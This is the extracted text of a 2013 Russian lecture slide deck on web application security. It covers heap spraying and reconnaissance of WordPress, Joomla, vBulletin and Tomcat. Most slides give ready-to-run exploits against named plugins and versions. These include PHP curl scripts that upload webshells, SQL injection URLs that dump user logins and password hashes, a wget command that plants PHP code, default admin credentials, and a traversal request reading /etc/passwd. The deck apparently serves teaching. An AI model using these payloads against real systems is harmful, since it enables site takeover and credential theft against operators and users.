Empfohlen
Weitere ähnliche Inhalte
Was ist angesagt?
Was ist angesagt? (19)
Andere mochten auch
Andere mochten auch (20)
Ähnlich wie Безопасность интернет-приложений осень 2013 лекция 10
Ähnlich wie Безопасность интернет-приложений осень 2013 лекция 10 (13)
Mehr von Technopark
Mehr von Technopark (20)
Kürzlich hochgeladen
Kürzlich hochgeladen (20)
Безопасность интернет-приложений осень 2013 лекция 10
- 2. spray the heap JS VB ActionScript HTML5 SGML SVG exploit the bug profit! Любой динамически задаваемый контент. 2
- 3. heap[slen]:NOPS nops = unescape("%u0D0D%u0D0D"); shellcode = unescape("%u...); heap = new Array(); for ( i=0; i<slen;i++){ heap[i] = nops + shellcode; } exploit(); shell heap[slen-1]:NOPS shell ... heap[0]:NOPS shell 3
- 4. var a = (0x11223344^0x44332211^0x44332211^ ...); 0: b8 44 33 22 11 5: 35 11 22 33 44 a: 35 11 22 33 44 1: 2: 4: a: mov $0x11223344,%eax xor $0x44332211,%eax xor $0x44332211,%eax 44 inc %esp 33 22 xor (%edx),%esp 11 35 11 22 33 44 adc %esi,0x44332211 35 11 22 33 44 xor $0x44332211,%eax 4
- 6. Wordpress checks admin location /wp-admin/ admin user admin plugins /wp-content/plugins themes /wp-content/themes scanner nmap http-wordpress-plugins nmap --script=http-wordpress-plugins --script-args http-wordpress-plugins.root="/blog/" <target> 6
- 7. Exploit: suco theme file upload <?php $uploadfile="devilscream.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> shell: http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php 7
- 8. Exploit: wp-realty blind sql http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php? action=contact_friend&popup=yes&listing_id=[SQLi] 8
- 9. Exploit: Complete Gallery Manager 3.3.3 file upload <?php $uploadfile="up.php"; $ch = curl_init(" http://target/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php "); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> 9
- 10. Exploit: All Video Gallery 1.1 sqli http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users-- 10
- 11. Joomla checks admin location /administrator/ admin user admin components /components/com_* parameter components /?option=com_* scanner joomscan 11
- 12. Exploit: redSHOP component sqli http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22 %20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,% 20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422 12
- 13. Exploit: com_civicrm component remote code execution wget –post-data "<?php phpinfo(); ?>" http://target/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofclibrary/ofc_upload_image.php?name=shell.php 13
- 14. vBulletin checks admin location /admincp/ admin user admin addons / 14
- 15. Exploit: Yet Another Award sqli Google dork: inurl:awards.php intext:"powered by vbulletin" $vbulletin->input->clean_array_gpc('p', array( 'award_id' => TYPE_UINT, //'award_request_name' => TYPE_STR, //'award_request_recipient_name' => TYPE_STR, 'award_request_reason' => TYPE_STR, 'award_request_uid' => TYPE_UNIT, )); $award_request_uid = $vbulletin->GPC['award_request_uid']; $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db>escape_string($vbulletin->GPC['award_request_reason']) ."')"); http://[site].com/request_award.php POST: do=submit&name=award_id=[VALID REWARD ID]& award_request_reason=0&award_request_uid=0[SQL]&submit=Submit 15
- 16. Exploit: vBulletin 4.1.10 LFI http://target/Patch/includes/functions_cron.php?nextitem=[Lfi] http://[site].com/request_award.php POST: do=submit&name=award_id=[VALID REWARD ID]& award_request_reason=0&award_request_uid=0[SQL]&submit=Submit 16
- 17. Tomcat checks admin location /admin/ /manager/ admin user admin addons / tomcat:tomcat password:password admin:admin admin:password admin:<nopassword> tomcat:<nopassword> 17
- 18. Exploit: tomcat < 6.0.18 utf8 directory traversal GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 18
- 19. 5 апреля 2010 jira issue: http://tinyurl.com/XXXXXXXXX XSS получение административного доступа в jira backdoor 19